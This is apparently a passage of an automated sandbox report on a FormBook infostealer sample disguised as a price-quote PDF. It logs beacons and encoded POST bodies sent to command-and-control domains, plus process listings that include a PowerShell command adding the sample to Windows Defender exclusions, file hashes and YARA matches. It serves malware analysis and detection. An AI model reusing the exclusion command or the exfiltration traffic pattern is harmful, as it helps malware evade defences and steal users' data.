                31 | 192.168.2.9 | 49745 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:45.087466002 CEST | 1768 | OUT | POST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:45.743979931 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:45 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                32 | 192.168.2.9 | 49746 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:47.620908976 CEST | 471 | OUT | GET /dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:48.411839962 CEST | 113 | IN | HTTP/1.1 439
                date: Wed, 03 Jul 2024 06:55:48 GMT
                content-length: 0
                server: Parking/1.0
                connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                33 | 192.168.2.9 | 49747 | 47.239.13.172 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:02.093267918 CEST | 731 | OUT | POST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=kuuAdnIh73KYOnExmVGR911YPHgBk9dU2nYeiTbE+u1pABEckOd1lkj3b0rtGhg3H/oNa/otPNy0mqoNt1mL5qAgPDxgDtlPlPJPpC+eI5c+x/nlw8h6D3H9iqp819T7Ss4fzA0rR/hnjjSvgUfXLgF9FCH0ah8/BPJ0HG2C2M/wmpDcRHzhFkpS4tc/
                Jul 3, 2024 08:56:03.085141897 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:02 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                34 | 192.168.2.9 | 49748 | 47.239.13.172 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:04.638586998 CEST | 755 | OUT | POST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:05.551534891 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:05 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                35 | 192.168.2.9 | 49749 | 47.239.13.172 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:07.189765930 CEST | 1768 | OUT | POST /2dv8/ HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.qe1jqiste.sbs
                Referer: http://www.qe1jqiste.sbs/2dv8/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:08.322679043 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:07 GMT
                Content-Type: text/html
                Content-Length: 2
                Connection: close
                ETag: "660279db-2"
                Data Raw: 31 0a
                Data Ascii: 1


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                36 | 192.168.2.9 | 49750 | 47.239.13.172 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:09.881717920 CEST | 471 | OUT | GET /2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.qe1jqiste.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:10.748578072 CEST | 224 | IN | HTTP/1.1 200 OK
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:10 GMT
                Content-Type: text/html
                Content-Length: 2
                Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                Connection: close
                ETag: "660279db-2"
                Accept-Ranges: bytes
                Data Raw: 31 0a
                Data Ascii: 1


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                37 | 192.168.2.9 | 49751 | 208.91.197.27 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:16.022083044 CEST | 755 | OUT | POST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                38 | 192.168.2.9 | 49752 | 208.91.197.27 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:18.562242985 CEST | 779 | OUT | POST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                39 | 192.168.2.9 | 49753 | 208.91.197.27 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:21.103302956 CEST | 1792 | OUT | POST /n12h/ HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.thesprinklesontop.com
                Referer: http://www.thesprinklesontop.com/n12h/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                40 | 192.168.2.9 | 49754 | 208.91.197.27 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:23.640914917 CEST | 479 | OUT | GET /n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.thesprinklesontop.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:28.030664921 CEST | 1236 | IN | HTTP/1.1 200 OK
                Date: Wed, 03 Jul 2024 06:56:17 GMT
                Server: Apache
                Set-Cookie: vsid=928vr467535377683394548; expires=Mon, 02-Jul-2029 06:56:17 GMT; Max-Age=157680000; path=/; domain=www.thesprinklesontop.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BMWiwp+3lgGQSokjUsSRozT3whbhVpeMV/aH8/LDh70uPzYF42dcvbstbn3VN6b8MK8NpgLCKol1f06azTKdGQ==
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                41 | 192.168.2.9 | 49755 | 66.235.200.146 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:33.481767893 CEST | 737 | OUT | POST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:34.201245070 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:34 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=wq93zh6QjYHzH9DTIIA6l77pbfuhMjdj_Wia_iHEJB0-1719989794146-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4f9f3bacf1871-EWR
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                42 | 192.168.2.9 | 49756 | 66.235.200.146 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:36.014218092 CEST | 761 | OUT | POST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:36.741837025 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:36 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=9nefUG9JgfK8Jvaa6cx.jYVHOqwB4jkc9O3wfoY8OYQ-1719989796691-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa03a8a01871-EWR
                Content-Encoding: gzip


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                43 | 192.168.2.9 | 49757 | 66.235.200.146 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:56:38.826242924 CEST | 1774 | OUT | POST /0rsk/ HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.stefanogaus.com
                Referer: http://www.stefanogaus.com/0rsk/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:39.743156910 CEST  1236  IN  HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:39 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Vary: Accept-Encoding
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: DYNAMIC
                Set-Cookie: _cfuvid=Cw9MB1XKSws5DhwZsI061vsdZkGfcndq5IStvW62SM0-1719989799693-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa1538f0c431-EWR
                Content-Encoding: gzip


                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                44          192.168.2.9  49758        66.235.200.146  80                1356  C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp  Bytes transferred  Direction  Data
                Jul 3, 2024 08:56:41.357758045 CEST  473  OUT  GET /0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.stefanogaus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:42.050311089 CEST  801  IN  HTTP/1.1 301 Moved Permanently
                Date: Wed, 03 Jul 2024 06:56:42 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                X-Redirect-By: WordPress
                Location: http://stefanogaus.com/0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4
                host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                CF-Cache-Status: MISS
                Set-Cookie: _cfuvid=Hq2KKU0W0dfbvCTweY6smCUdRQeiiq2SLvQL46Mr9RU-1719989802004-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnly
                Server: cloudflare
                CF-RAY: 89d4fa24fb484376-EWR
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                45          192.168.2.9  49759        23.111.180.146  80                1356  C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp  Bytes transferred  Direction  Data
                Jul 3, 2024 08:56:50.135997057 CEST  477  OUT  GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1
                Host: www.highwavesmarine.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:56:50.652805090 CEST  193  IN  HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:56:50 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 10File not found.0


                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                46          192.168.2.9  49760        103.197.25.241  80                1356  C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp  Bytes transferred  Direction  Data
                Jul 3, 2024 08:56:55.682832003 CEST  722  OUT  POST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
                Jul 3, 2024 08:56:56.594702959 CEST  289  IN  HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:56:56 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Target ID:0
                Start time:02:52:48
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xaf0000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:3
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0x470000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff70f010000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xb0000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:6
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0x300000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:7
                Start time:02:52:49
                Start date:03/07/2024
                Path:C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
                Imagebase:0xf40000
                File size:721'920 bytes
                MD5 hash:7C9C6894AC6C53F5066C4E42A0E2121F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                Target ID:8
                Start time:02:53:04
                Start date:03/07/2024
                Path:C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe"
                Imagebase:0xe10000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
